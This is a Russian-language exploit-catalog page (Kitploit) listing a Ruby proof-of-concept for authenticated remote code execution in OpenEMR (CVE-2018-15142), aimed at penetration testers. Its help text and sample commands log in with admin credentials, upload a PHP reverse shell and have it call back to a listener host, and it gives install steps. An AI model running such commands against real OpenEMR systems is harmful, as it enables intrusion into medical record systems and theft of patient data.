Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
OpenEMR-RCE — OpenEMR <= 5.0.1 - (аутентифицированное) удалённое выполнение кода | Kitploit
Инструменты/GitHubGitHub/noraj/openemr-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubnoraj/openemr-rce

OpenEMR-RCE

OpenEMR <= 5.0.1 - (аутентифицированное) удалённое выполнение кода

Репозиторий
85 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

Эксплойт OpenEMR RCE / PoC

OpenEMR <= 5.0.1.4 - (аутентифицированное) удалённое выполнение кода

Эксплойт для CVE-2018-15142.

[EDB-49486] [PacketStorm] [WLB-2020080011]

Использование

root@kitploit:~
$ ruby exploit.rb --help
OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution

Usage:
  exploit.rb manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
  exploit.rb semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
  exploit.rb auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
  exploit.rb -H | --help

Options:
  -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
  -s <filename>, --shell <filename>     Filename of the PHP reverse shell payload
  -u <username>, --user <username>      Username of the admin
  -p <password>, --password <password>  Password of the admin
  -m <payload>, --payload <payload>     Metasploit PHP payload
  -h <host>, --lhost <host>             Reverse shell local host
  -t <port>, --lport <port>             Reverse shell local port
  --debug                               Display arguments
  -H, --help                            Show this screen

Examples:
  exploit.rb manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
  exploit.rb semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
  exploit.rb auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999

Режимы

  • Авто: вы знаете цель и у вас готов слушатель — эксплойт сделает всё остальное
  • Полуавто: как авто, но вы хотите указать другой payload вместо стандартного php/reverse_php
  • Вручную: у вас уже есть собственный PHP reverse shell, эксплойт позволяет указать его

Требования

  • httpclient
  • docopt.rb
  • (Необязательно) Metasploit Framework (msfvenom для генерации reverse shell в режимах auto и semi-auto)

Пример для BlackArch:

root@kitploit:~
pacman -S ruby-httpclient ruby-docopt metasploit

Пример с использованием gem:

root@kitploit:~
gem install httpclient docopt

Ссылки

Это улучшенная переработка EDB-ID-48515 и реализация части 2 EDB-ID-45202:

  • использование аргументов (вместо захардкоженных значений)
  • возможность указать собственный PHP reverse shell или автоматически сгенерировать его с помощью msfconsole
  • чище и более настраиваемо
  • написан на ruby (python2 устарел)

Этот эксплойт тестировался с Ruby 2.7.1.

О EDB-ID-48515:

root@kitploit:~
Exploit Author: Musyoka Ian
Date: 2020-05-25
Vendor Homepage: https://www.open-emr.org/
Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile 
Version: < 5.0.1 (Patch 4)
Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69
Скачать инструмент